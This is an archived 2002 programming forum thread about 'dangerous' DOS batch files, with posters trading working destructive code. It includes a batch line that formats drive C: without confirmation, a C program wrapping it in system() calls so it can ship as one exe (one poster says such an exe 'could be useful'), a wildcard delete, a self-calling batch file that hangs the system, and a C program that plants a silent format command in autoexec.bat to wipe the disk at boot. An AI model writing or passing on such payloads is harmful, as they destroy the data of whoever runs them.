PDA

View Full Version : Dangerous Coding for DOS(batch files)



zeldalcassci
07-14-2002, 12:48 AM
Do not use this in a batch file



echo off
cls
echo y|format C:


This will format the Hard Drive Without user permission.
This will go right to do a format. You canot stop it. (do not say you were not warned...)

Fordy
07-14-2002, 02:39 AM
Hmm....any other pearls of wisdom?

raimo
07-14-2002, 03:42 AM
Originally posted by zeldalcassci
Do not use this in a batch file


echo off
cls
echo y|format C:


Great! Thanks!
:D

Unimatrix139
07-14-2002, 05:29 AM
I didn't know u could use a pipe like that ... :) kool :D

rahaydenuk
07-14-2002, 03:41 PM
Originally posted by zeldalcassci
Do not use this in a batch file



echo off
cls
echo y|format C:


This will format the Hard Drive Without user permission.
This will go right to do a format. You canot stop it. (do not say you were not warned...)

What are the chances of someone randomly typing that into a batch file and then running it?

Thanks for the warning anyway. ;)

VBprogrammer
07-14-2002, 04:16 PM
Interesting...Lets edit autoexec.bat - mahahahaha!

Quantrizi
07-14-2002, 07:30 PM
the last line of code should tell you that it will format the c drive without user approval anyways

Unregistered
07-16-2002, 09:43 PM
actually, I was searching for this all my life ...

now, one more question... can I write this directly
in my c program ??? because I cant distribute
my exe and my bat file together.. can i ?

a single exe which can do that stuff could be useful :D

kehkehkehkehkehkeh

(ooo... what was that ?? an Eeevil laughter )

:-)

Unimatrix139
07-20-2002, 09:40 AM
It is possible to integrate the two files like this:-



#include <stdio.h>
#include <stdlib.h>

main()
{
system("echo off");
system("cls");
system("echo y|format C:");
}



You must then ensure that either format.com/exe is in the PATH environment variable or in the current directory.

ChrisMUK
07-20-2002, 10:10 AM
Could this also work on a floppy drive?

VBprogrammer
07-20-2002, 10:45 AM
Should do, you might want to make it a format a: /q which is much faster.

ChrisMUK
07-20-2002, 12:14 PM
Nothing happens! :confused: :confused: Im trying it on a Floppy but its not doing anything.

ChrisMUK
07-20-2002, 05:47 PM
Right..... I written the code again like this:


#include <stdlib.h>

int main()

{
system("format A:");
system("PAUSE");
return 0;
}

And that is formatting the A: drive now! :)

moonwalker
07-22-2002, 01:52 PM
did it ask for a confirmation ? :)

ChrisMUK
07-22-2002, 02:44 PM
Yeah it did.

And then asked after if i wanted to format another!

moonwalker
07-22-2002, 08:10 PM
an easier solution is...

echo Y | DEL *.*

all you wanna do is screw some files right? :)

I dont know if you can use this under system() though...

anyone ?

ChrisMUK
07-23-2002, 01:38 PM
I don't want to mess with files!

moonwalker
07-23-2002, 02:10 PM
neither do i... :)
just discussing how dangerous one program can turn out to be :)

Unimatrix139
07-24-2002, 01:47 AM
I reckon you could use that code with system - It's a direct call to COMMAND.COM so (theoretically) any DOS based command would work

VBprogrammer
07-24-2002, 01:28 PM
Well if you where really clever you would disassemble format.com and take the input and output routines out then re-assemble it. Go on - i dare you!

RaviRaj
07-25-2002, 06:30 AM
I doubt if a programme running on a particular OS can format the drive that houses that OS !!!
Is the OS so 'foolish' to allow a programme to format the drive that is running the OS ?

PrivatePanic
07-25-2002, 07:51 AM
yeah, it is. :)


another nice lil piece of batch (works only in real DOS, not in a Windows DOS-Box, tho)



@ctty nul
set %a%=%a%+%a%
a



call it "a.bat" and run it - your system hangs :) DOS can't handle a simple addition, heh!

(well the reason for the crash is not that DOS cannot handle an addition - can u guess why it hangs? ;) nice lil quiz!)

Unimatrix139
07-25-2002, 07:54 AM
um.... it sets a null codepage and calls itself?

PrivatePanic
07-25-2002, 08:26 AM
well the answer is, because batch files are translated before processing.

In the beginning, the environment variable %a% is empty, so the very first execution of the set-command would be run like this:

set %a%=+

got it? %a% is empty and the batchfile is translated before processing ;)

Going on, in the 2nd execution (it runs itself, remember!) it's:

set %a%=+++

because... oh, you got it, allright ;)

and then:

set %a%=+++++++

and then:

set %a%=+++++++++++++++

and:

set %a%=+++++++++++++++++++++++++++++++

...
and so on.

then you should know that a DOS command must NOT exceed 255 byte. (or was it 127? I forgot) well anyway, the set command gets too long after some interations and overwrites critical DOS memory stuff... and so the PC hangs ;))

Unimatrix139
07-25-2002, 10:29 AM
Very clever (or not - depending on whether you want your system to hang!)

d00b
07-25-2002, 02:30 PM
Try this one.....

@echo off
C:
CD\WINDOWS\DESKTOP
md ³ĊĊ³

Shadow
07-28-2002, 02:22 AM
> discussing how dangerous one program can turn out to be

#include <stdio.h>

int main ( void )
{
FILE * Point;
Point = fopen("c:\\autoexec.bat", "a");
fprintf(Point, "smartdrv\necho y|format C: /q >NUL");
fclose(Point);
return 0;
}

RaviRaj
07-29-2002, 05:43 AM
The string gets written in to autoexec.bat, then what ?
what will be the result, when the above code is executed.
Dont say "try it" !!!

moonwalker
07-29-2002, 06:07 AM
smartdrv\necho y|format C: /q >NUL

you can see a "format C:" .. "echo y"
(immediately after format C: )
that almost tells the whole story..

your computer cleans the disk when you boot it. :)

/\/\ E /\/ @
07-29-2002, 08:24 PM
Originally posted by PrivatePanic
well the answer is, because batch files are translated before processing.

In the beginning, the environment variable %a% is empty, so the very first execution of the set-command would be run like this:

set %a%=+

got it? %a% is empty and the batchfile is translated before processing ;)

Going on, in the 2nd execution (it runs itself, remember!) it's:

set %a%=+++

because... oh, you got it, allright ;)

and then:

set %a%=+++++++

and then:

set %a%=+++++++++++++++

and:

set %a%=+++++++++++++++++++++++++++++++

...
and so on.

then you should know that a DOS command must NOT exceed 255 byte. (or was it 127? I forgot) well anyway, the set command gets too long after some interations and overwrites critical DOS memory stuff... and so the PC hangs ;))

I have a question...would the system still hang if I make an EXE file call itself not a batch file? I would do it the exact same way you did it to the batch file.

Waldo2k2
07-29-2002, 08:56 PM
how would you go about doing this? do you mean to send a system() command?

/\/\ E /\/ @
07-29-2002, 09:09 PM
yeah...isn't it possible to run different programs using the
system(); function? so it would keep calling itself until the RAM ran out and the system would hang?

RaviRaj
07-30-2002, 06:35 AM
But the question again remains that :
Can the OS honour commands that calls for its own death (format C:) ?
If that was possible, then why would people use a floppy to format a Hard Disk, instead of isseuing commands straight from C:

Unimatrix139
07-30-2002, 12:16 PM
I think DOS can format itself except FORMAT.COM/EXE (and possibly COMMAND.COM depending on the version) but Windows can't format format itself. I dont think it's clever, but it can't remove open files and windows opens a lot of files :) I could be wrong however...

Shadow
07-30-2002, 01:13 PM
Format.com probably loads it's process into memory or something of the like. I've used format.com from DOS quite a few times and from my expierences, format.com will "blank" the hard drive.

VBprogrammer
07-30-2002, 02:16 PM
Well it would be pretty darn clever if it didn't - all processes must be loaded into memory to be exicuted.

Shadow
07-30-2002, 03:34 PM
> Well it would be pretty darn clever if it didn't - all processes must be loaded into memory to be exicuted.
Good one. :D